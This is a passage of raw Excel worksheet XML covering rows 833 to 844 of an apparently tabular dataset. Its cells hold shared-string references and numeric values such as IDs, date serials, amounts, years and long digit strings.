      </c>
      <c r="AJ833">
        <v>252</v>
      </c>
      <c r="AK833" t="s">
        <v>4855</v>
      </c>
      <c r="AL833" t="s">
        <v>6464</v>
      </c>
      <c r="AM833" t="s">
        <v>6465</v>
      </c>
      <c r="AN833" t="s">
        <v>55</v>
      </c>
      <c r="AO833">
        <v>2003</v>
      </c>
      <c r="AP833" t="s">
        <v>6466</v>
      </c>
      <c r="AQ833" t="s">
        <v>6467</v>
      </c>
      <c r="AR833" t="s">
        <v>6463</v>
      </c>
      <c r="AS833" t="s">
        <v>71</v>
      </c>
      <c r="AT833" t="s">
        <v>58</v>
      </c>
      <c r="AU833">
        <v>26</v>
      </c>
      <c r="AV833">
        <v>3</v>
      </c>
      <c r="AW833">
        <v>1</v>
      </c>
      <c r="AX833">
        <v>0</v>
      </c>
      <c r="AY833">
        <v>23</v>
      </c>
      <c r="AZ833">
        <v>5</v>
      </c>
      <c r="BA833" t="s">
        <v>16984</v>
      </c>
      <c r="BB833" t="s">
        <v>15490</v>
      </c>
      <c r="BC833">
        <v>0</v>
      </c>
      <c r="BD833" t="s">
        <v>10075</v>
      </c>
    </row>
    <row r="834" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A834">
        <v>2124</v>
      </c>
      <c r="B834" t="s">
        <v>6468</v>
      </c>
      <c r="C834" t="s">
        <v>2760</v>
      </c>
      <c r="D834" t="s">
        <v>6469</v>
      </c>
      <c r="E834" t="s">
        <v>111</v>
      </c>
      <c r="F834" t="s">
        <v>6470</v>
      </c>
      <c r="G834" s="1">
        <v>44308</v>
      </c>
      <c r="H834">
        <v>9788</v>
      </c>
      <c r="I834">
        <v>9788</v>
      </c>
      <c r="J834">
        <v>2</v>
      </c>
      <c r="K834">
        <v>3</v>
      </c>
      <c r="L834">
        <v>4</v>
      </c>
      <c r="M834">
        <v>0</v>
      </c>
      <c r="N834">
        <v>0</v>
      </c>
      <c r="O834">
        <v>0</v>
      </c>
      <c r="P834">
        <v>0</v>
      </c>
      <c r="Q834">
        <v>0</v>
      </c>
      <c r="R834">
        <v>0</v>
      </c>
      <c r="S834">
        <v>0</v>
      </c>
      <c r="T834">
        <v>0</v>
      </c>
      <c r="U834">
        <v>350000</v>
      </c>
      <c r="V834">
        <v>5000</v>
      </c>
      <c r="W834">
        <v>20000</v>
      </c>
      <c r="X834">
        <v>0</v>
      </c>
      <c r="Y834">
        <v>0</v>
      </c>
      <c r="Z834">
        <v>0</v>
      </c>
      <c r="AA834">
        <v>0</v>
      </c>
      <c r="AB834">
        <v>0</v>
      </c>
      <c r="AC834">
        <v>0</v>
      </c>
      <c r="AD834">
        <v>0</v>
      </c>
      <c r="AE834">
        <v>0</v>
      </c>
      <c r="AF834" t="s">
        <v>6471</v>
      </c>
      <c r="AG834">
        <v>83654</v>
      </c>
      <c r="AH834">
        <v>18</v>
      </c>
      <c r="AJ834">
        <v>285</v>
      </c>
      <c r="AK834" t="s">
        <v>4146</v>
      </c>
      <c r="AL834" t="s">
        <v>4147</v>
      </c>
      <c r="AM834" t="s">
        <v>6472</v>
      </c>
      <c r="AN834" t="s">
        <v>55</v>
      </c>
      <c r="AO834">
        <v>2001</v>
      </c>
      <c r="AP834">
        <v>85339963669</v>
      </c>
      <c r="AQ834" t="s">
        <v>6473</v>
      </c>
      <c r="AR834" t="s">
        <v>6471</v>
      </c>
      <c r="AS834" t="s">
        <v>71</v>
      </c>
      <c r="AT834" t="s">
        <v>58</v>
      </c>
      <c r="AU834">
        <v>7</v>
      </c>
      <c r="AV834">
        <v>0</v>
      </c>
      <c r="AW834">
        <v>0</v>
      </c>
      <c r="AX834">
        <v>0</v>
      </c>
      <c r="AY834">
        <v>42</v>
      </c>
      <c r="AZ834">
        <v>4</v>
      </c>
      <c r="BA834" t="s">
        <v>17072</v>
      </c>
      <c r="BB834" t="s">
        <v>15715</v>
      </c>
      <c r="BC834" t="s">
        <v>13458</v>
      </c>
      <c r="BD834">
        <v>0</v>
      </c>
    </row>
    <row r="835" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A835">
        <v>1772</v>
      </c>
      <c r="B835" t="s">
        <v>6474</v>
      </c>
      <c r="C835" t="s">
        <v>726</v>
      </c>
      <c r="D835" t="s">
        <v>6475</v>
      </c>
      <c r="E835" t="s">
        <v>111</v>
      </c>
      <c r="F835" t="s">
        <v>6476</v>
      </c>
      <c r="G835" s="1">
        <v>44278</v>
      </c>
      <c r="H835">
        <v>9936</v>
      </c>
      <c r="I835">
        <v>9936</v>
      </c>
      <c r="J835">
        <v>1</v>
      </c>
      <c r="K835">
        <v>0</v>
      </c>
      <c r="L835">
        <v>1</v>
      </c>
      <c r="M835">
        <v>0</v>
      </c>
      <c r="N835">
        <v>0</v>
      </c>
      <c r="O835">
        <v>0</v>
      </c>
      <c r="P835">
        <v>0</v>
      </c>
      <c r="Q835">
        <v>2</v>
      </c>
      <c r="R835">
        <v>1</v>
      </c>
      <c r="S835">
        <v>0</v>
      </c>
      <c r="T835">
        <v>1</v>
      </c>
      <c r="U835">
        <v>150</v>
      </c>
      <c r="V835">
        <v>0</v>
      </c>
      <c r="W835">
        <v>3000</v>
      </c>
      <c r="X835">
        <v>0</v>
      </c>
      <c r="Y835">
        <v>0</v>
      </c>
      <c r="Z835">
        <v>0</v>
      </c>
      <c r="AA835">
        <v>0</v>
      </c>
      <c r="AB835">
        <v>1</v>
      </c>
      <c r="AC835">
        <v>3000</v>
      </c>
      <c r="AD835">
        <v>0</v>
      </c>
      <c r="AE835">
        <v>17</v>
      </c>
      <c r="AF835" t="s">
        <v>6477</v>
      </c>
      <c r="AG835">
        <v>97791</v>
      </c>
      <c r="AH835">
        <v>32</v>
      </c>
      <c r="AJ835">
        <v>466</v>
      </c>
      <c r="AK835" t="s">
        <v>730</v>
      </c>
      <c r="AL835" t="s">
        <v>731</v>
      </c>
      <c r="AM835" t="s">
        <v>6478</v>
      </c>
      <c r="AN835" t="s">
        <v>55</v>
      </c>
      <c r="AO835">
        <v>2018</v>
      </c>
      <c r="AP835">
        <v>81391647792</v>
      </c>
      <c r="AQ835" t="s">
        <v>6479</v>
      </c>
      <c r="AR835" t="s">
        <v>6480</v>
      </c>
      <c r="AS835" t="s">
        <v>71</v>
      </c>
      <c r="AT835" t="s">
        <v>58</v>
      </c>
      <c r="AU835">
        <v>6</v>
      </c>
      <c r="AV835">
        <v>1</v>
      </c>
      <c r="AW835">
        <v>6</v>
      </c>
      <c r="AX835">
        <v>1</v>
      </c>
      <c r="AY835">
        <v>1</v>
      </c>
      <c r="AZ835">
        <v>0</v>
      </c>
      <c r="BA835" t="s">
        <v>16992</v>
      </c>
      <c r="BB835" t="s">
        <v>14727</v>
      </c>
      <c r="BC835" t="s">
        <v>9693</v>
      </c>
      <c r="BD835">
        <v>0</v>
      </c>
    </row>
    <row r="836" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A836">
        <v>1835</v>
      </c>
      <c r="B836" t="s">
        <v>6481</v>
      </c>
      <c r="C836" t="s">
        <v>215</v>
      </c>
      <c r="D836" t="s">
        <v>6482</v>
      </c>
      <c r="E836" t="s">
        <v>142</v>
      </c>
      <c r="F836" t="s">
        <v>143</v>
      </c>
      <c r="G836" s="1">
        <v>44354</v>
      </c>
      <c r="H836">
        <v>10068</v>
      </c>
      <c r="I836">
        <v>10068</v>
      </c>
      <c r="J836">
        <v>0</v>
      </c>
      <c r="K836">
        <v>0</v>
      </c>
      <c r="L836">
        <v>0</v>
      </c>
      <c r="M836">
        <v>0</v>
      </c>
      <c r="N836">
        <v>0</v>
      </c>
      <c r="O836">
        <v>0</v>
      </c>
      <c r="P836">
        <v>0</v>
      </c>
      <c r="Q836">
        <v>1</v>
      </c>
      <c r="R836">
        <v>1</v>
      </c>
      <c r="S836">
        <v>0</v>
      </c>
      <c r="T836">
        <v>0</v>
      </c>
      <c r="U836">
        <v>0</v>
      </c>
      <c r="V836">
        <v>0</v>
      </c>
      <c r="W836">
        <v>0</v>
      </c>
      <c r="X836">
        <v>0</v>
      </c>
      <c r="Y836">
        <v>0</v>
      </c>
      <c r="Z836">
        <v>0</v>
      </c>
      <c r="AA836">
        <v>0</v>
      </c>
      <c r="AB836">
        <v>500</v>
      </c>
      <c r="AC836">
        <v>500</v>
      </c>
      <c r="AD836">
        <v>0</v>
      </c>
      <c r="AE836">
        <v>0</v>
      </c>
      <c r="AF836" t="s">
        <v>6483</v>
      </c>
      <c r="AG836">
        <v>33511</v>
      </c>
      <c r="AH836">
        <v>6</v>
      </c>
      <c r="AJ836">
        <v>146</v>
      </c>
      <c r="AK836" t="s">
        <v>6484</v>
      </c>
      <c r="AL836" t="s">
        <v>6485</v>
      </c>
      <c r="AM836" t="s">
        <v>6486</v>
      </c>
      <c r="AN836" t="s">
        <v>68</v>
      </c>
      <c r="AO836">
        <v>2015</v>
      </c>
      <c r="AP836">
        <v>81949225342</v>
      </c>
      <c r="AQ836" t="s">
        <v>6483</v>
      </c>
      <c r="AR836" t="s">
        <v>6483</v>
      </c>
      <c r="AS836" t="s">
        <v>71</v>
      </c>
      <c r="AT836" t="s">
        <v>72</v>
      </c>
      <c r="AU836">
        <v>20</v>
      </c>
      <c r="AV836">
        <v>0</v>
      </c>
      <c r="AW836">
        <v>0</v>
      </c>
      <c r="AX836">
        <v>2</v>
      </c>
      <c r="AY836">
        <v>3</v>
      </c>
      <c r="AZ836">
        <v>4</v>
      </c>
      <c r="BA836" t="s">
        <v>17007</v>
      </c>
      <c r="BB836" t="s">
        <v>15543</v>
      </c>
      <c r="BC836" t="s">
        <v>13944</v>
      </c>
      <c r="BD836">
        <v>0</v>
      </c>
    </row>
    <row r="837" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A837">
        <v>1771</v>
      </c>
      <c r="B837" t="s">
        <v>6487</v>
      </c>
      <c r="C837" t="s">
        <v>2308</v>
      </c>
      <c r="D837" t="s">
        <v>6305</v>
      </c>
      <c r="E837" t="s">
        <v>142</v>
      </c>
      <c r="F837" t="s">
        <v>1746</v>
      </c>
      <c r="G837" s="1">
        <v>44278</v>
      </c>
      <c r="H837">
        <v>10077</v>
      </c>
      <c r="I837">
        <v>10077</v>
      </c>
      <c r="J837">
        <v>3</v>
      </c>
      <c r="K837">
        <v>0</v>
      </c>
      <c r="L837">
        <v>0</v>
      </c>
      <c r="M837">
        <v>3</v>
      </c>
      <c r="N837">
        <v>0</v>
      </c>
      <c r="O837">
        <v>0</v>
      </c>
      <c r="P837">
        <v>0</v>
      </c>
      <c r="Q837">
        <v>10</v>
      </c>
      <c r="R837">
        <v>10</v>
      </c>
      <c r="S837">
        <v>0</v>
      </c>
      <c r="T837">
        <v>1</v>
      </c>
      <c r="U837">
        <v>60000</v>
      </c>
      <c r="V837">
        <v>0</v>
      </c>
      <c r="W837">
        <v>0</v>
      </c>
      <c r="X837">
        <v>1500</v>
      </c>
      <c r="Y837">
        <v>0</v>
      </c>
      <c r="Z837">
        <v>0</v>
      </c>
      <c r="AA837">
        <v>0</v>
      </c>
      <c r="AB837">
        <v>5000</v>
      </c>
      <c r="AC837">
        <v>5000</v>
      </c>
      <c r="AD837">
        <v>0</v>
      </c>
      <c r="AE837">
        <v>5000</v>
      </c>
      <c r="AF837" t="s">
        <v>6488</v>
      </c>
      <c r="AG837">
        <v>98415</v>
      </c>
      <c r="AH837">
        <v>33</v>
      </c>
      <c r="AJ837">
        <v>485</v>
      </c>
      <c r="AK837" t="s">
        <v>2313</v>
      </c>
      <c r="AL837" t="s">
        <v>2314</v>
      </c>
      <c r="AM837" t="s">
        <v>6489</v>
      </c>
      <c r="AN837" t="s">
        <v>68</v>
      </c>
      <c r="AO837">
        <v>2004</v>
      </c>
      <c r="AP837" t="s">
        <v>6490</v>
      </c>
      <c r="AQ837" t="s">
        <v>6491</v>
      </c>
      <c r="AR837" t="s">
        <v>6488</v>
      </c>
      <c r="AS837" t="s">
        <v>71</v>
      </c>
      <c r="AT837" t="s">
        <v>72</v>
      </c>
      <c r="AU837">
        <v>25</v>
      </c>
      <c r="AV837">
        <v>1</v>
      </c>
      <c r="AW837">
        <v>4</v>
      </c>
      <c r="AX837">
        <v>5</v>
      </c>
      <c r="AY837">
        <v>6</v>
      </c>
      <c r="AZ837">
        <v>6</v>
      </c>
      <c r="BA837" t="s">
        <v>16991</v>
      </c>
      <c r="BB837" t="s">
        <v>15500</v>
      </c>
      <c r="BC837" t="s">
        <v>9536</v>
      </c>
      <c r="BD837">
        <v>0</v>
      </c>
    </row>
    <row r="838" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A838">
        <v>1799</v>
      </c>
      <c r="B838" t="s">
        <v>6492</v>
      </c>
      <c r="C838" t="s">
        <v>318</v>
      </c>
      <c r="D838" t="s">
        <v>6493</v>
      </c>
      <c r="E838" t="s">
        <v>363</v>
      </c>
      <c r="F838" t="s">
        <v>364</v>
      </c>
      <c r="G838" s="1">
        <v>44307</v>
      </c>
      <c r="H838">
        <v>10155</v>
      </c>
      <c r="I838">
        <v>10155</v>
      </c>
      <c r="J838">
        <v>0</v>
      </c>
      <c r="K838">
        <v>0</v>
      </c>
      <c r="L838">
        <v>0</v>
      </c>
      <c r="M838">
        <v>0</v>
      </c>
      <c r="N838">
        <v>0</v>
      </c>
      <c r="O838">
        <v>0</v>
      </c>
      <c r="P838">
        <v>0</v>
      </c>
      <c r="Q838">
        <v>0</v>
      </c>
      <c r="R838">
        <v>0</v>
      </c>
      <c r="S838">
        <v>0</v>
      </c>
      <c r="T838">
        <v>1</v>
      </c>
      <c r="U838">
        <v>0</v>
      </c>
      <c r="V838">
        <v>0</v>
      </c>
      <c r="W838">
        <v>0</v>
      </c>
      <c r="X838">
        <v>0</v>
      </c>
      <c r="Y838">
        <v>0</v>
      </c>
      <c r="Z838">
        <v>0</v>
      </c>
      <c r="AA838">
        <v>0</v>
      </c>
      <c r="AB838">
        <v>0</v>
      </c>
      <c r="AC838">
        <v>0</v>
      </c>
      <c r="AD838">
        <v>0</v>
      </c>
      <c r="AE838">
        <v>1500000</v>
      </c>
      <c r="AF838" t="s">
        <v>6494</v>
      </c>
      <c r="AG838">
        <v>90241</v>
      </c>
      <c r="AH838">
        <v>26</v>
      </c>
      <c r="AJ838">
        <v>420</v>
      </c>
      <c r="AK838" t="s">
        <v>331</v>
      </c>
      <c r="AL838" t="s">
        <v>332</v>
      </c>
      <c r="AM838" t="s">
        <v>6495</v>
      </c>
      <c r="AN838" t="s">
        <v>55</v>
      </c>
      <c r="AO838">
        <v>2013</v>
      </c>
      <c r="AP838">
        <v>81216511127</v>
      </c>
      <c r="AQ838" t="s">
        <v>6496</v>
      </c>
      <c r="AR838" t="s">
        <v>6497</v>
      </c>
      <c r="AS838" t="s">
        <v>371</v>
      </c>
      <c r="AT838" t="s">
        <v>58</v>
      </c>
      <c r="AU838">
        <v>26</v>
      </c>
      <c r="AV838">
        <v>1</v>
      </c>
      <c r="AW838">
        <v>15</v>
      </c>
      <c r="AX838">
        <v>17</v>
      </c>
      <c r="AY838">
        <v>1</v>
      </c>
      <c r="AZ838">
        <v>2</v>
      </c>
      <c r="BA838" t="s">
        <v>16999</v>
      </c>
      <c r="BB838" t="s">
        <v>15520</v>
      </c>
      <c r="BC838">
        <v>0</v>
      </c>
      <c r="BD838" t="s">
        <v>13590</v>
      </c>
    </row>
    <row r="839" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A839">
        <v>1840</v>
      </c>
      <c r="B839" t="s">
        <v>6498</v>
      </c>
      <c r="C839" t="s">
        <v>318</v>
      </c>
      <c r="D839" t="s">
        <v>6499</v>
      </c>
      <c r="E839" t="s">
        <v>363</v>
      </c>
      <c r="F839" t="s">
        <v>364</v>
      </c>
      <c r="G839" s="1">
        <v>44326</v>
      </c>
      <c r="H839">
        <v>10203</v>
      </c>
      <c r="I839">
        <v>10203</v>
      </c>
      <c r="J839">
        <v>0</v>
      </c>
      <c r="K839">
        <v>0</v>
      </c>
      <c r="L839">
        <v>0</v>
      </c>
      <c r="M839">
        <v>0</v>
      </c>
      <c r="N839">
        <v>0</v>
      </c>
      <c r="O839">
        <v>0</v>
      </c>
      <c r="P839">
        <v>0</v>
      </c>
      <c r="Q839">
        <v>0</v>
      </c>
      <c r="R839">
        <v>0</v>
      </c>
      <c r="S839">
        <v>0</v>
      </c>
      <c r="T839">
        <v>2</v>
      </c>
      <c r="U839">
        <v>0</v>
      </c>
      <c r="V839">
        <v>0</v>
      </c>
      <c r="W839">
        <v>0</v>
      </c>
      <c r="X839">
        <v>0</v>
      </c>
      <c r="Y839">
        <v>0</v>
      </c>
      <c r="Z839">
        <v>0</v>
      </c>
      <c r="AA839">
        <v>0</v>
      </c>
      <c r="AB839">
        <v>0</v>
      </c>
      <c r="AC839">
        <v>0</v>
      </c>
      <c r="AD839">
        <v>0</v>
      </c>
      <c r="AE839">
        <v>200000</v>
      </c>
      <c r="AF839" t="s">
        <v>6500</v>
      </c>
      <c r="AG839">
        <v>90241</v>
      </c>
      <c r="AH839">
        <v>26</v>
      </c>
      <c r="AJ839">
        <v>420</v>
      </c>
      <c r="AK839" t="s">
        <v>331</v>
      </c>
      <c r="AL839" t="s">
        <v>5112</v>
      </c>
      <c r="AM839" t="s">
        <v>6501</v>
      </c>
      <c r="AN839" t="s">
        <v>55</v>
      </c>
      <c r="AO839">
        <v>2008</v>
      </c>
      <c r="AP839">
        <v>85100606099</v>
      </c>
      <c r="AQ839">
        <v>81943436285</v>
      </c>
      <c r="AR839" t="s">
        <v>6500</v>
      </c>
      <c r="AS839" t="s">
        <v>371</v>
      </c>
      <c r="AT839" t="s">
        <v>58</v>
      </c>
      <c r="AU839">
        <v>26</v>
      </c>
      <c r="AV839">
        <v>0</v>
      </c>
      <c r="AW839">
        <v>4</v>
      </c>
      <c r="AX839">
        <v>7</v>
      </c>
      <c r="AY839">
        <v>3</v>
      </c>
      <c r="AZ839">
        <v>2</v>
      </c>
      <c r="BA839" t="s">
        <v>17008</v>
      </c>
      <c r="BB839" t="s">
        <v>15545</v>
      </c>
      <c r="BC839">
        <v>0</v>
      </c>
      <c r="BD839" t="s">
        <v>13600</v>
      </c>
    </row>
    <row r="840" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A840">
        <v>2129</v>
      </c>
      <c r="B840" t="s">
        <v>6502</v>
      </c>
      <c r="C840" t="s">
        <v>477</v>
      </c>
      <c r="D840" t="s">
        <v>6503</v>
      </c>
      <c r="E840" t="s">
        <v>944</v>
      </c>
      <c r="F840" t="s">
        <v>6504</v>
      </c>
      <c r="G840" s="1">
        <v>44343</v>
      </c>
      <c r="H840">
        <v>10235</v>
      </c>
      <c r="I840">
        <v>10235</v>
      </c>
      <c r="J840">
        <v>6</v>
      </c>
      <c r="K840">
        <v>0</v>
      </c>
      <c r="L840">
        <v>4</v>
      </c>
      <c r="M840">
        <v>0</v>
      </c>
      <c r="N840">
        <v>0</v>
      </c>
      <c r="O840">
        <v>0</v>
      </c>
      <c r="P840">
        <v>4</v>
      </c>
      <c r="Q840">
        <v>0</v>
      </c>
      <c r="R840">
        <v>0</v>
      </c>
      <c r="S840">
        <v>6</v>
      </c>
      <c r="T840">
        <v>1</v>
      </c>
      <c r="U840">
        <v>650000</v>
      </c>
      <c r="V840">
        <v>0</v>
      </c>
      <c r="W840">
        <v>33000</v>
      </c>
      <c r="X840">
        <v>0</v>
      </c>
      <c r="Y840">
        <v>0</v>
      </c>
      <c r="Z840">
        <v>0</v>
      </c>
      <c r="AA840">
        <v>3500</v>
      </c>
      <c r="AB840">
        <v>0</v>
      </c>
      <c r="AC840">
        <v>0</v>
      </c>
      <c r="AD840">
        <v>3500</v>
      </c>
      <c r="AE840">
        <v>2000000</v>
      </c>
      <c r="AF840" t="s">
        <v>6505</v>
      </c>
      <c r="AG840">
        <v>95542</v>
      </c>
      <c r="AH840">
        <v>29</v>
      </c>
      <c r="AJ840">
        <v>383</v>
      </c>
      <c r="AK840" t="s">
        <v>1963</v>
      </c>
      <c r="AL840" t="s">
        <v>6506</v>
      </c>
      <c r="AM840" t="s">
        <v>6507</v>
      </c>
      <c r="AN840" t="s">
        <v>55</v>
      </c>
      <c r="AO840">
        <v>2005</v>
      </c>
      <c r="AP840" t="s">
        <v>6508</v>
      </c>
      <c r="AQ840" t="s">
        <v>6509</v>
      </c>
      <c r="AR840" t="s">
        <v>6510</v>
      </c>
      <c r="AS840" t="s">
        <v>71</v>
      </c>
      <c r="AT840" t="s">
        <v>58</v>
      </c>
      <c r="AU840">
        <v>25</v>
      </c>
      <c r="AV840">
        <v>3</v>
      </c>
      <c r="AW840">
        <v>362</v>
      </c>
      <c r="AX840">
        <v>650</v>
      </c>
      <c r="AY840">
        <v>62</v>
      </c>
      <c r="AZ840">
        <v>23</v>
      </c>
      <c r="BA840" t="s">
        <v>17075</v>
      </c>
      <c r="BB840" t="s">
        <v>15719</v>
      </c>
      <c r="BC840" t="s">
        <v>13620</v>
      </c>
      <c r="BD840" t="s">
        <v>10018</v>
      </c>
    </row>
    <row r="841" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A841">
        <v>1842</v>
      </c>
      <c r="B841" t="s">
        <v>6511</v>
      </c>
      <c r="C841" t="s">
        <v>157</v>
      </c>
      <c r="D841" t="s">
        <v>6512</v>
      </c>
      <c r="E841" t="s">
        <v>363</v>
      </c>
      <c r="F841" t="s">
        <v>6513</v>
      </c>
      <c r="G841" s="1">
        <v>44323</v>
      </c>
      <c r="H841">
        <v>10266</v>
      </c>
      <c r="I841">
        <v>10266</v>
      </c>
      <c r="J841">
        <v>0</v>
      </c>
      <c r="K841">
        <v>5</v>
      </c>
      <c r="L841">
        <v>0</v>
      </c>
      <c r="M841">
        <v>0</v>
      </c>
      <c r="N841">
        <v>0</v>
      </c>
      <c r="O841">
        <v>0</v>
      </c>
      <c r="P841">
        <v>0</v>
      </c>
      <c r="Q841">
        <v>6</v>
      </c>
      <c r="R841">
        <v>0</v>
      </c>
      <c r="S841">
        <v>0</v>
      </c>
      <c r="T841">
        <v>5</v>
      </c>
      <c r="U841">
        <v>0</v>
      </c>
      <c r="V841">
        <v>5000</v>
      </c>
      <c r="W841">
        <v>0</v>
      </c>
      <c r="X841">
        <v>0</v>
      </c>
      <c r="Y841">
        <v>0</v>
      </c>
      <c r="Z841">
        <v>0</v>
      </c>
      <c r="AA841">
        <v>0</v>
      </c>
      <c r="AB841">
        <v>800</v>
      </c>
      <c r="AC841">
        <v>0</v>
      </c>
      <c r="AD841">
        <v>0</v>
      </c>
      <c r="AE841">
        <v>5000</v>
      </c>
      <c r="AF841" t="s">
        <v>6514</v>
      </c>
      <c r="AG841">
        <v>69465</v>
      </c>
      <c r="AH841">
        <v>16</v>
      </c>
      <c r="AJ841">
        <v>256</v>
      </c>
      <c r="AK841" t="s">
        <v>6515</v>
      </c>
      <c r="AL841" t="s">
        <v>6516</v>
      </c>
      <c r="AM841" t="s">
        <v>6517</v>
      </c>
      <c r="AN841" t="s">
        <v>55</v>
      </c>
      <c r="AO841">
        <v>1992</v>
      </c>
      <c r="AP841" t="s">
        <v>6518</v>
      </c>
      <c r="AQ841" t="s">
        <v>6519</v>
      </c>
      <c r="AR841" t="s">
        <v>6520</v>
      </c>
      <c r="AS841" t="s">
        <v>71</v>
      </c>
      <c r="AT841" t="s">
        <v>58</v>
      </c>
      <c r="AU841">
        <v>0</v>
      </c>
      <c r="AV841">
        <v>0</v>
      </c>
      <c r="AW841">
        <v>11</v>
      </c>
      <c r="AX841">
        <v>40</v>
      </c>
      <c r="AY841">
        <v>14</v>
      </c>
      <c r="AZ841">
        <v>42</v>
      </c>
      <c r="BA841" t="s">
        <v>16779</v>
      </c>
      <c r="BB841" t="s">
        <v>14952</v>
      </c>
      <c r="BC841">
        <v>0</v>
      </c>
      <c r="BD841" t="s">
        <v>9810</v>
      </c>
    </row>
    <row r="842" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A842">
        <v>1759</v>
      </c>
      <c r="B842" t="s">
        <v>6521</v>
      </c>
      <c r="C842" t="s">
        <v>157</v>
      </c>
      <c r="D842" t="s">
        <v>6522</v>
      </c>
      <c r="E842" t="s">
        <v>363</v>
      </c>
      <c r="F842" t="s">
        <v>1580</v>
      </c>
      <c r="G842" s="1">
        <v>44327</v>
      </c>
      <c r="H842">
        <v>10370</v>
      </c>
      <c r="I842">
        <v>10370</v>
      </c>
      <c r="J842">
        <v>0</v>
      </c>
      <c r="K842">
        <v>0</v>
      </c>
      <c r="L842">
        <v>0</v>
      </c>
      <c r="M842">
        <v>0</v>
      </c>
      <c r="N842">
        <v>0</v>
      </c>
      <c r="O842">
        <v>0</v>
      </c>
      <c r="P842">
        <v>0</v>
      </c>
      <c r="Q842">
        <v>0</v>
      </c>
      <c r="R842">
        <v>0</v>
      </c>
      <c r="S842">
        <v>0</v>
      </c>
      <c r="T842">
        <v>1</v>
      </c>
      <c r="U842">
        <v>0</v>
      </c>
      <c r="V842">
        <v>0</v>
      </c>
      <c r="W842">
        <v>0</v>
      </c>
      <c r="X842">
        <v>0</v>
      </c>
      <c r="Y842">
        <v>0</v>
      </c>
      <c r="Z842">
        <v>0</v>
      </c>
      <c r="AA842">
        <v>0</v>
      </c>
      <c r="AB842">
        <v>0</v>
      </c>
      <c r="AC842">
        <v>0</v>
      </c>
      <c r="AD842">
        <v>0</v>
      </c>
      <c r="AE842">
        <v>20</v>
      </c>
      <c r="AF842" t="s">
        <v>6523</v>
      </c>
      <c r="AG842">
        <v>61175</v>
      </c>
      <c r="AH842">
        <v>16</v>
      </c>
      <c r="AJ842">
        <v>252</v>
      </c>
      <c r="AK842" t="s">
        <v>6524</v>
      </c>
      <c r="AL842" t="s">
        <v>6525</v>
      </c>
      <c r="AM842" t="s">
        <v>6526</v>
      </c>
      <c r="AN842" t="s">
        <v>55</v>
      </c>
      <c r="AO842">
        <v>2016</v>
      </c>
      <c r="AP842" t="s">
        <v>6527</v>
      </c>
      <c r="AQ842" t="s">
        <v>6528</v>
      </c>
      <c r="AR842" t="s">
        <v>6523</v>
      </c>
      <c r="AS842" t="s">
        <v>71</v>
      </c>
      <c r="AT842" t="s">
        <v>58</v>
      </c>
      <c r="AU842">
        <v>6</v>
      </c>
      <c r="AV842">
        <v>0</v>
      </c>
      <c r="AW842">
        <v>0</v>
      </c>
      <c r="AX842">
        <v>0</v>
      </c>
      <c r="AY842">
        <v>4</v>
      </c>
      <c r="AZ842">
        <v>1</v>
      </c>
      <c r="BA842" t="s">
        <v>16987</v>
      </c>
      <c r="BB842" t="s">
        <v>15496</v>
      </c>
      <c r="BC842">
        <v>0</v>
      </c>
      <c r="BD842" t="s">
        <v>13663</v>
      </c>
    </row>
    <row r="843" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A843">
        <v>1745</v>
      </c>
      <c r="B843" t="s">
        <v>6529</v>
      </c>
      <c r="C843" t="s">
        <v>157</v>
      </c>
      <c r="D843" t="s">
        <v>6530</v>
      </c>
      <c r="E843" t="s">
        <v>142</v>
      </c>
      <c r="F843" t="s">
        <v>6531</v>
      </c>
      <c r="G843" s="1">
        <v>44365</v>
      </c>
      <c r="H843">
        <v>10404</v>
      </c>
      <c r="I843">
        <v>10404</v>
      </c>
      <c r="J843">
        <v>1</v>
      </c>
      <c r="K843">
        <v>0</v>
      </c>
      <c r="L843">
        <v>0</v>
      </c>
      <c r="M843">
        <v>0</v>
      </c>
      <c r="N843">
        <v>0</v>
      </c>
      <c r="O843">
        <v>0</v>
      </c>
      <c r="P843">
        <v>0</v>
      </c>
      <c r="Q843">
        <v>0</v>
      </c>
      <c r="R843">
        <v>0</v>
      </c>
      <c r="S843">
        <v>0</v>
      </c>
      <c r="T843">
        <v>1</v>
      </c>
      <c r="U843">
        <v>1500000</v>
      </c>
      <c r="V843">
        <v>0</v>
      </c>
      <c r="W843">
        <v>0</v>
      </c>
      <c r="X843">
        <v>0</v>
      </c>
      <c r="Y843">
        <v>0</v>
      </c>
      <c r="Z843">
        <v>0</v>
      </c>
      <c r="AA843">
        <v>0</v>
      </c>
      <c r="AB843">
        <v>0</v>
      </c>
      <c r="AC843">
        <v>0</v>
      </c>
      <c r="AD843">
        <v>0</v>
      </c>
      <c r="AE843">
        <v>0</v>
      </c>
      <c r="AF843" t="s">
        <v>6532</v>
      </c>
      <c r="AG843">
        <v>60182</v>
      </c>
      <c r="AH843">
        <v>16</v>
      </c>
      <c r="AJ843">
        <v>264</v>
      </c>
      <c r="AK843" t="s">
        <v>211</v>
      </c>
      <c r="AL843" t="s">
        <v>6533</v>
      </c>
      <c r="AM843" t="s">
        <v>6534</v>
      </c>
      <c r="AN843" t="s">
        <v>55</v>
      </c>
      <c r="AO843">
        <v>2014</v>
      </c>
      <c r="AP843" t="s">
        <v>6535</v>
      </c>
      <c r="AQ843" t="s">
        <v>6536</v>
      </c>
      <c r="AR843" t="s">
        <v>6532</v>
      </c>
      <c r="AS843" t="s">
        <v>179</v>
      </c>
      <c r="AT843" t="s">
        <v>58</v>
      </c>
      <c r="AU843">
        <v>26</v>
      </c>
      <c r="AV843">
        <v>0</v>
      </c>
      <c r="AW843">
        <v>15</v>
      </c>
      <c r="AX843">
        <v>3</v>
      </c>
      <c r="AY843">
        <v>3</v>
      </c>
      <c r="AZ843">
        <v>1</v>
      </c>
      <c r="BA843" t="s">
        <v>16858</v>
      </c>
      <c r="BB843" t="s">
        <v>15228</v>
      </c>
      <c r="BC843" t="s">
        <v>10238</v>
      </c>
      <c r="BD843">
        <v>0</v>
      </c>
    </row>
    <row r="844" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A844">
        <v>2624</v>
      </c>
      <c r="B844" t="s">
        <v>6537</v>
      </c>
      <c r="C844" t="s">
        <v>157</v>
      </c>
